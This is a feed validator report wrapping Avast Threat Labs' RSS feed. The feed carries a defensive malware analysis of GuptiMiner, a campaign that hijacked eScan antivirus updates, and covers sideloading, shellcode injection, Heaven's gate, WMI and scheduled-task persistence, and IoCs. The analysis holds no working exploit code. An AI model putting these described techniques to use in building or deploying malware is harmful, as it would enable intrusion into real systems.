FEED Validator

for Atom and RSS and KML

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

line 119, column 0: content:encoded should not contain fetchpriority attribute [help]
```
<div class="wp-block-image">
```
line 119, column 0: content:encoded should not contain decoding attribute (227 occurrences) [help]
```
<div class="wp-block-image">
```
line 119, column 0: content:encoded should not contain sizes attribute (222 occurrences) [help]
```
<div class="wp-block-image">
```
line 218, column 0: content:encoded should not contain loading attribute (224 occurrences) [help]
```
<div class="wp-block-image">
```
line 1702, column 3: content:encoded should not contain relative URL references: #ioc (20 occurrences) [help]
```
]]></content:encoded>
   ^
```
line 5116, column 0: content:encoded should not contain controls attribute (2 occurrences) [help]
```
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
```
line 6198, column 0: content:encoded should not contain data-align attribute (30 occurrences) [help]

line 6562, column 0: item contains more than one enclosure [help]

<enclosure url="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ ...

Source: https://decoded.avast.io/feed/

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Avast Threat Labs</title>
<atom:link href="https://decoded.avast.io/feed/" rel="self" type="application/rss+xml" />
<link>https://decoded.avast.io/</link>
<description>Uncovering Tactics, Techniques and Procedures of malicious actors</description>
<lastBuildDate>Tue, 23 Apr 2024 08:54:25 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.4.3</generator>
<image>
<url>https://decoded.avast.io/wp-content/uploads/sites/2/2019/07/cropped-Asset-25ldpi-32x32.png</url>
<title>Avast Threat Labs</title>
<link>https://decoded.avast.io/</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining</title>
<link>https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining</link>
<dc:creator><![CDATA[Jan Rubín and Milánek]]></dc:creator>
<pubDate>Tue, 23 Apr 2024 09:00:00 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[antivirus]]></category>
<category><![CDATA[backdoor]]></category>
<category><![CDATA[cryptomining]]></category>
<category><![CDATA[Kimsuky]]></category>
<category><![CDATA[malware]]></category>
<category><![CDATA[mitm]]></category>
<category><![CDATA[xmrig]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8115</guid>
<description><![CDATA[<p>Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.</p>
<p>The post <a href="https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/">GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h2 class="wp-block-heading">Key Points</h2>
<ul>
<li>Avast discovered and analyzed a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers</li>
<li>Avast disclosed the vulnerability to both eScan antivirus and India CERT. On 2023-07-31, eScan confirmed that the issue was fixed and successfully resolved</li>
<li>The campaign was orchestrated by a threat actor with possible ties to Kimsuky</li>
<li>Two different types of backdoors have been discovered, targeting large corporate networks</li>
<li>The final payload distributed by GuptiMiner was also XMRig</li>
</ul>
<h2 class="wp-block-heading">Introduction</h2>
<p>We’ve been tracking a curious one here. Firstly, GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker’s DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others.</p>
<p>The main objective of GuptiMiner is to distribute backdoors within big corporate networks. We’ve encountered two different variants of these backdoors: The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and cryptowallets on the local system.</p>
<p>Interestingly, GuptiMiner also distributes XMRig on the infected devices, which is a bit unexpected for such a thought-through operation.</p>
<p>The actors behind GuptiMiner have been capitalizing on an insecurity within an update mechanism of Indian antivirus vendor eScan to distribute the malware by performing a man-in-the-middle attack. We disclosed this security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved.</p>
<p>GuptiMiner is a long-standing malware, with traces of it dating back to 2018 though it is likely that it is even older. We have also found that GuptiMiner has possible ties to Kimsuky, a notorious North Korean APT group, by observing similarities between Kimsuky keylogger and parts of the GuptiMiner operation.<br>In this analysis, we will cover the GuptiMiner’s features and its evolution over time. We will also denote in which samples the particular features are contained or introduced to support the overall comprehension in the vast range of IoCs.</p>
<p>It is also important to note that since the users rarely install more than one AV on their machine, we may have limited visibility into GuptiMiner’s activity and its overall scope. Because of this, we might be looking only at the tip of the iceberg and the true scope of the entire operation may still be subject to discovery.</p>
<h2 class="wp-block-heading">Infection Chain</h2>
<p>To illustrate the complexity of the whole infection, we’ve provided a flow chart containing all parts of the chain. Note that some of the used filenames and/or workflows can slightly vary depending on the specific version of GuptiMiner, but the flowchart below illustrates the overall process.</p>
<p>The whole process starts with eScan requesting an update from the update server where an unknown MitM intercepts the download and swaps the update package with a malicious one. Then, eScan unpacks and loads the package and a DLL is sideloaded by eScan clean binaries. This DLL enables the rest of the chain, following with multiple shellcodes and intermediary PE loaders.</p>
<p>Resulted GuptiMiner consists of using XMRig on the infected machine as well as introducing backdoors which are activated when deployed in large corporate networks.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58.png"><img fetchpriority="high" decoding="async" width="579" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-579x1024.png" alt="" class="wp-image-8511" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-579x1024.png 579w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-170x300.png 170w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-768x1358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-868x1536.png 868w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-1158x2048.png 1158w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58.png 2024w" sizes="(max-width: 579px) 100vw, 579px" /></a><figcaption class="wp-element-caption"><em>GuptiMiner’s infection chain</em></figcaption></figure></div>
<h2 class="wp-block-heading">Evolution and Timelines</h2>
<p>GuptiMiner has been active since at least 2018. Over the years, the developers behind it have improved the malware significantly, bringing new features to the table. We will describe the specific features in detail in respective subsections.</p>
<p>With that said, we also wanted to illustrate the significant IoCs in a timeline representation, how they changed over time – focusing on mutexes, PDBs, and used domains. These timelines were created based on scanning for the IoCs over a large sample dataset, taking the first and last compilation timestamps of the samples, then forming the intervals. Note that the scanned dataset is larger than listed IoCs in the <a href="#ioc">IoC section</a>. For more detailed list of IoCs, please visit our <a href="https://github.com/avast/ioc/tree/master/GuptiMiner" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>
<h3 class="wp-block-heading" id="domains-in-time">Domains in Time</h3>
<p>In general, GuptiMiner uses the following types of domains during its operations: </p>
<ul>
<li><code>Malicious DNS</code> – GuptiMiner hosts their own DNS servers for serving true destination domain addresses of C&C servers via DNS TXT responses </li>
<li><code>Requested domains</code> – Domains for which the malware queries the DNS servers for </li>
<li><code>PNG download</code> – Servers for downloading payloads in the form of PNG files. These PNG files are valid images (a logo of T-Mobile) that contain appended shellcodes at their end </li>
<li><code>Config mining pool</code> – GuptiMiner contains two different configurations of mining pools. One is hardcoded directly in the XMRig config which is denoted in this group </li>
<li><code>Modified mining pool</code> – GuptiMiner has the ability to modify the pre-defined mining pools which is denoted in this group </li>
<li><code>Final C&C</code> – Domains that are used in the last backdoor stage of GuptiMiner, providing additional malware capabilities in the backdoored systems </li>
<li><code>Other</code> – Domains serving different purposes, e.g., used in scripts </li>
</ul>
<p>Note that as the malware connects to the malicious DNS servers directly, the DNS protocol is completely separated from the DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware. The DNS protocol is used here as a functional equivalent of telnet. Because of this, this technique is not a DNS spoofing since spoofing traditionally happens on the DNS network. </p>
<p>Furthermore, the fact that the servers for which GuptiMiner asks for in the <code>Requested domain</code> category actually exist is purely a coincidence, or rather a network obfuscation to confuse network monitoring tools and analysts.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2.png"><img decoding="async" width="750" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-750x1024.png" alt="" class="wp-image-8395" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-750x1024.png 750w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-220x300.png 220w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-768x1049.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-1125x1536.png 1125w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2.png 1262w" sizes="(max-width: 750px) 100vw, 750px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating GuptiMiner’s usage of domains in time</em></figcaption></figure></div>
<p>From this timeline, it is apparent that authors behind GuptiMiner realize the correct setup of their DNS servers is crucial for the whole chain to work properly. Because of this, we can observe the biggest rotation and shorter timeframes are present in the <code>Malicious DNS</code> group. </p>
<p>Furthermore, since domains in the <code>Requested domain</code> group are irrelevant (at least from the technical viewpoint), we can notice that the authors are reusing the same domain names for longer periods of time. </p>
<h3 class="wp-block-heading" id="mutexes-in-time">Mutexes in Time </h3>
<p>Mutexes help ensure correct execution flow of a software and malware authors often use these named objects for the same purpose. Since 2018, GuptiMiner has changed its mutexes multiple times. Most significantly, we can notice a change since 2021 where the authors changed the mutexes to reflect the compilation/distribution dates of their new versions. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3.png"><img decoding="async" width="975" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-975x1024.png" alt="" class="wp-image-8398" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-975x1024.png 975w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-286x300.png 286w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-768x807.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3.png 1270w" sizes="(max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating GuptiMiner’s usage of mutexes in time</em></figcaption></figure></div>
<p>An attentive reader can likely observe two takeaways: The first is the apparent outliers in usage of <code>MIVOD_6</code>, <code>SLDV15</code>, <code>SLDV13</code>, and <code>Global\Wed Jun  2 09:43:03 2021</code>. According to our data, these mutexes were truly reused multiple times in different builds, creating larger timeframes than expected. </p>
<p>Another point is the re-introduction of <code>PROCESS_</code> mutex near the end of last year. At this time, the authors reintroduced the mutex with the string in UTF-16 encoding, which we noted separately.</p>
<h3 class="wp-block-heading">PDBs in Time </h3>
<p>With regard to debugging symbols, the authors of GuptiMiner left multiple PDB paths in their binaries. Most of the time, they contain strings like <code>MainWork</code>, <code>Projects</code>, etc. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4.png"><img loading="lazy" decoding="async" width="1024" height="340" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1024x340.png" alt="" class="wp-image-8400" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1024x340.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-300x100.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-768x255.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1536x510.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-2048x680.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating PDBs contained in GuptiMiner in time</em></figcaption></figure></div>
<h2 class="wp-block-heading" id="installation-process">Stage 0 – Installation Process </h2>
<h3 class="wp-block-heading">Intercepting the Updates</h3>
<p>Everyone should update their software, right? Usually, the individual either downloads the new version manually from the official vendor’s site, or – preferably – the software itself performs the update automatically without much thought or action from the user. But what happens when someone is able to hijack this automatic process? </p>
<p>Our investigation started as we began to observe some of our users were receiving unusual responses from otherwise legitimate requests, for example on: </p>
<p><code>http://update3[.]mwti[.]net/pub/update/updll3.dlz</code></p>
<p>This is truly a legitimate URL to download the <code>updll3.dlz</code> file which is, under normal circumstances, a legitimate archive containing the update of the eScan antivirus. However, we started seeing suspicious behavior on some of our clients, originating exactly from URLs like this. </p>
<p>What we uncovered was that the actors behind GuptiMiner were performing man-in-the-middle (MitM) to download an infected installer on the victim’s PC, instead of the update. Unfortunately, we currently don’t have information on how the MitM was performed. We assume that some kind of pre-infection had to be present on the victim’s device or their network, causing the MitM. </p>
<h3 class="wp-block-heading">Update Package</h3>
<p><code><em>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3</em><br><em>(version.dll, 2018-04-19 09:47:41 UTC)</em></code></p>
<p>Throughout the analysis, we will try to describe not just the flow of the infection chain, malware techniques, and functionalities of the stages, but we will also focus on different versions, describing how the malware authors developed and changed GuptiMiner over time.</p>
<p>The first GuptiMiner sample that we were able to find was compiled on Tuesday, 2018-04-19 09:47:41 and it was uploaded to VirusTotal the day after from India, followed by an upload from Germany:<br><code>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3</code></p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png"><img loading="lazy" decoding="async" width="561" height="226" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png" alt="" class="wp-image-8403" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png 561w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5-300x121.png 300w" sizes="(max-width: 561px) 100vw, 561px" /></a></figure></div>
<p>This file was named <code>C:\Program Files\eScan\VERSION.DLL</code> which points out the target audience is truly eScan users and it comes from an update package downloaded by the AV. </p>
<p>Even though this version lacked several features present in the newer samples, the installation process is still the same, as follows: </p>
<ol start="1">
<li>The eScan updater triggers the update </li>
<li>The downloaded package file is replaced with a malicious one on the wire because of a missing HTTPS encryption (MitM is performed) </li>
<li>A malicious package <code>updll62.dlz</code> is downloaded and unpacked by eScan updater </li>
<li>The contents of the package contain a malicious DLL (usually called <code>version.dll</code>) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process – eScan – and it is loaded next time eScan runs, usually after a system restart </li>
<li>If a mutex is not present in the system (depends on the version, e.g. <code>Mutex_ONLY_ME_V1</code>), the malware searches for <code>services.exe</code> process and injects its next stage into the first one it can find </li>
<li>Cleanup is performed, removing the update package </li>
</ol>
<p>The malicious DLL contains additional functions which are not present in the clean one. Thankfully the names are very verbose, so no analysis was required for most of them. The list of the functions can be seen below.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png"><img loading="lazy" decoding="async" width="519" height="510" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png" alt="" class="wp-image-8405" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png 519w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6-300x295.png 300w" sizes="(max-width: 519px) 100vw, 519px" /></a><figcaption class="wp-element-caption"><em>Additional exported functions</em></figcaption></figure></div>
<p>Some functions, however, are unique. For example, the function <code>X64Call</code> provides Heaven’s gate, i.e., it is a helper function for running x64 code inside a 32-bit process on a 64-bit system. The malware needs this to be able to run the injected shellcode depending on the OS version and thus the bitness of the <code>services.exe</code> process. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png"><img loading="lazy" decoding="async" width="668" height="1192" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png" alt="" class="wp-image-8419" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png 668w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14-168x300.png 168w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14-574x1024.png 574w" sizes="(max-width: 668px) 100vw, 668px" /></a><figcaption class="wp-element-caption"><em>Heaven’s gate to run the shellcode in x64 environment when required</em></figcaption></figure></div>
<p>To keep the original eScan functionality intact, the malicious <code>version.dll</code> also needs to handle the original legacy <code>version.dll</code> functionality. This is done by forwarding all the exported functions from the original DLL. When a call of the legacy DLL function is identified, GuptiMiner resolves the original function and calls it afterwards. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png"><img loading="lazy" decoding="async" width="518" height="228" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png" alt="" class="wp-image-8408" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png 518w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8-300x132.png 300w" sizes="(max-width: 518px) 100vw, 518px" /></a><figcaption class="wp-element-caption"><em>Resolving function that ensures all the original <code>version.dll</code> exports are available</em></figcaption></figure></div>
<h3 class="wp-block-heading">Injected Shellcode in services.exe </h3>
<p>After the shellcode is injected into <code>services.exe</code>, it serves as a loader of the next stage. This is done by reading an embedded PE file in a plaintext form. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png"><img loading="lazy" decoding="async" width="550" height="287" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png" alt="" class="wp-image-8409" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png 550w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9-300x157.png 300w" sizes="(max-width: 550px) 100vw, 550px" /></a><figcaption class="wp-element-caption"><em>Embedded PE file loaded by the shellcode</em></figcaption></figure></div>
<p>This PE file is loaded by standard means, but additionally, the shellcode also destroys the PE’s DOS header and runs it by calling its entry point, as well as it removes the embedded PE from the original location memory altogether. </p>
<h4 class="wp-block-heading">Command Line Manipulation </h4>
<p>Across the entire GuptiMiner infection chain, every shellcode which is loading and injecting PE files also manipulates the command line of the current process. This is done by manipulating the result of <code>GetCommandLineA/W</code> which changes the resulted command line displayed for example in Task Manager. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png"><img loading="lazy" decoding="async" width="1127" height="581" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png" alt="" class="wp-image-8412" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png 1127w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-300x155.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-1024x528.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-768x396.png 768w" sizes="(max-width: 1127px) 100vw, 1127px" /></a><figcaption class="wp-element-caption"><em>Command line manipulation function</em></figcaption></figure></div>
<p>After inspecting this functionality, we believe it either doesn’t work as the authors intended or we don’t understand its usage. Long story short, the command line is changed in such a way that everything before the first <code>--parameter</code> is skipped, and this parameter is then appended to the process name. </p>
<p>To illustrate this, we could take a command:<br><code>notepad.exe param1 --XX param2</code><br>which will be transformed into:<br><code>notepad.exeXX param2</code> </p>
<p>However, we <strong>have not seen</strong> a usage like <code>power --shell.exe param1 param2</code> that would result into:<br><code>powershell.exe param1 param2</code><br>nor have we seen any concealment of parameters (like usernames and passwords for XMRig), a type of behavior we would anticipate when encountering something like this. In either case, this functionality is obfuscating the command line appearance, which is worth mentioning. An interested reader can play around with the functionality at the awesome godbolt.org <a href="https://godbolt.org/#z:OYLghAFBqd5QCxAYwPYBMCmBRdBLAF1QCcAaPECAMzwBtMA7AQwFtMQByARg9KtQYEAysib0QXACx8BBAKoBnTAAUAHpwAMvAFYTStJg1DIApACYAQuYukl9ZATwDKjdAGFUtAK4sGIM6SuADJ4DJgAcj4ARpjEIJIAzKQADqgKhE4MHt6%2B/ilpGQIhYZEsMXGJtpj2jgJCBEzEBNk%2BfgF2mA6Z9Y0ExRHRsfFJCg1NLbntY32hA2VDiQCUtqhexMjsHOYJocjeWADUJgluo8ShwAB0CMfYJhoAgtu7%2B5hHJ2wsJACe17f3TzMOwYey8h2OpwI%2BFQfwSd0eANCBAOBxYhjwyS8BgImAA%2BoZ0nhcWgWGiGOhcbRZhBkAhGgcAFQkskUqlhRYAkwAdisjxRSIOeGOFgOAHpRUcAKwWYgKZLWMwaG6SgAiUplUWSAFozAAOZUqgH8wQHGiygi4uVMDb4qg44i45LEVAbBQKXHMNjCsUSkzS2XyyxmSQG9XETU6kN%2Bw18wUms2jXHoJgKG4JEXisNyhX66NhiOKg1Go4I2PFhMW5Op95qjTC8t4c2W5LWvFMO2xR3O13uz1vY61%2Bux/jEA4QQU1g519MHZmGVmzP0WIWq73Wax4A4css84sozNarV7wVUMcHMBgCtJlMII5mABs5nvs9QpPnlMX0pXaoHA/PHC1MAODvR8HxfN9yQ/MIl03awDi4PNfwSNUgMA4DtweFEsNNRtEyrW8/yFdNjzwU9xwvK8rRtdt7S7F1MDdD1WH7B8n3AlkoMwGDEOQv8gP/EC2KZV8OLZN4Lz4rYzDMIDjxRbk3AU89L1wi0qLbDsHSdejGL7QSwLnSCxO41Ua0kgSnzYwyF2gr8Di1eCeMNZD/3MGTgMssDhIgmz%2B14lzZOk/iMOw7leUw7CcKbdTbVo7SeyYthJyI8LQq5GMIu5DL%2BTI5Sr3wo4uUUoq8tU5tW1izt4oY3tmK3Y9iEwAg1gYeCgiCIcIs%2BL4ADdMAgY8n2szil0oltqM0uiEr7aNSEGh9huM6V8pvO8RTMWaSPsqLEximiqu7GrEreBz7w5YjY0a5riFarh2s6rLOUeAU0VCCAkVIWc6WIBkGQwsLj1pelkBYdAlycu8zAYVAcRbdBLkwVQ3hbYhWAULh7K1AANLGDhRtGNslNwGDczrsKdJEqAG6TzElBQ3M%2BkH0HO1KsLJDEsSYHF8QYQliRE98xJpUGWePCnBCptzD1uO86b9YmGdnEWHtLJ50o4ZZaE4SVeD8DgtFIVBOEUyw4IUVZ1hYhIeFIAhNA15YAGsQASBJLldj3Pa9%2B99E4SRdftw3OF4BQQA0W37eWOBYCQElkjoWJyEoOOE7iYAuASAIaFoe1Q4gKJA6iUJGm%2BTgbaL5hiG%2BAB5KJtE6O3uF4ZlGAIauGFoUv9d4LAoi8YA3DEWhQ6b0gsDJYBxG7sfGwbvA%2BpHg3Ec6LwcUDpFqkDqkolRquPCwQOCHOFgy41vgDGABQADU8EwAB3avkkYU%2BZEEEQxHYKRX/kJQ1ED3QuD6EMMYdclh9B4CiKHSAyxUDJFqLzTgWpq5mF4KgPqxBzhYCgRAZYHQujOAgK4CYfhAHBFmKUcoehUjpHgcQqhBR4H9AoUMQBeD4E9HGJ4Voeg2HdGmEwwYcRWHTDocI3oAj5hCNwRbDYEhNbawDtPI2wFVC6nvFqe8kgDjAGQMgeCbszBjlwIQEgd5raLF4I3LQiwnYuzdl7BxHsfZaw4P7UgesDbKJDmHCO3co4wEQCAVYBBMQECTjSV88d6DEHCMxTgqj1GaO0bo/RlwUGBHwEQTBeh%2BBv1EOIL%2BuSf4qHUNPABpA76o2SKfeRHAdbuMDso6uq9QkHFQKeBJGitE6L0RnNJY4PAsCibEMxXALG%2BOsbY127tHEON9q4xRnjg62B8VYh28z0keNQcstZNjSDoPSM4SQQA%3D" target="_blank" rel="noreferrer noopener">here</a>. </p>
<h3 class="wp-block-heading" id="code-virtualization">Code Virtualization </h3>
<p><code><em>7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6</em><br><em>(version.dll, 2018-06-12 03:30:01)</em> </code></p>
<p>Another version with a mutex <code>ONLY_ME_V3</code> introduced a code virtualization. This can be observed by an additional section in the PE file called <code>.v_lizer</code>. This section was also renamed a few times in later builds.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png"><img loading="lazy" decoding="async" width="1232" height="322" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png" alt="" class="wp-image-8423" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png 1232w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-300x78.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-1024x268.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-768x201.png 768w" sizes="(max-width: 1232px) 100vw, 1232px" /></a><figcaption class="wp-element-caption"><em>A new section with the virtualized code is called <code>.v_lizer</code></em></figcaption></figure></div>
<p>Thankfully the obfuscation is rather weak, provided the shellcode as well as the embedded PE file are still in the plaintext form. </p>
<p>Furthermore, the authors started to distinguish between the <code>version.dll</code> stage and the PE file loaded by the shellcode by additional mutex. Previously, both stages used the shared mutex <code>ONLY_ME_Vx</code>, now the sideloading uses <code>MTX_V101</code> as a mutex.</p>
<h2 class="wp-block-heading" id="installation-improvements">Stage 0.9 – Installation Improvements</h2>
<p><code><em>3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c</em><br><em>(2021-03-28 14:41:07 UTC)</em> </code></p>
<p>The installation process has undergone multiple improvements over time, and, since it is rather different compared to older variants, we decided to describe it separately as an intermediary Stage 0.9. With these improvements, the authors introduced a usage of scheduled tasks, WMI events, two differently loaded next stages (<a href="#png-loader">Stage 1 – PNG loader</a>), turning off Windows Defender, and installing crafted certificates to Windows. </p>
<p>There are also multiple files dropped at this stage, enabling further sideloading by the malware. These files are clean and serve exclusively for sideloading purposes. The malicious DLLs that are being sideloaded, are two PNG loaders (Stage 1): </p>
<ul>
<li><code>de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739 *atiadlxx.dll</code> </li>
<li><code>e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee *BrLogAPI.dll</code> </li>
</ul>
<h3 class="wp-block-heading">WMI Events </h3>
<p><code><em>de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739</em><br><em>(atiadlxx.dll, 2021-03-28 14:30:11 UTC)</em> </code></p>
<p>At this stage, WMI events are used for loading the first of the PNG loaders. This loader is extracted to a path:<br><code>C:\PROGRAMDATA\AMD\CNext\atiadlxx.dll</code> </p>
<p>Along with it, additional clean files are dropped, and they are used for sideloading, in either of these locations (can be both): <br><code>C:\ProgramData\AMD\CNext\slsnotif.exe <br>C:\ProgramData\AMD\CNext\msvcr120.dll</code><br>or<br><code>C:\Program Files (x86)\AMD\CNext\CCCSlim\slsnotify.exe<br>C:\Program Files (x86)\AMD\CNext\CCCSlim\msvcr120.dll </code></p>
<p>The clean file <code>slsnotify.exe</code> is then registered via WMI event in such a way that it is executed when these conditions are met:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png"><img loading="lazy" decoding="async" width="850" height="192" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png" alt="" class="wp-image-8424" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17-300x68.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17-768x173.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>WMI conditions to trigger sideloading</em></figcaption></figure></div>
<p>In other words, the sideloading is performed on a workday in either January, July, or November. The numbers represented by <code>%d</code> are randomly selected values. The two possibilities for the hour are exactly two hours apart and fall within the range of 11–16 or 13–18 (inclusive). This conditioning further underlines the longevity of GuptiMiner operations.</p>
<h3 class="wp-block-heading">Scheduled Tasks</h3>
<p><code><em>e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee</em><br><em>(BrLogAPI.dll, 2021-03-28 14:10:27 UTC)</em></code></p>
<p>Similarly to the WMI events, GuptiMiner also drops a clean binary for sideloading at this location:<br><code>C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe</code> </p>
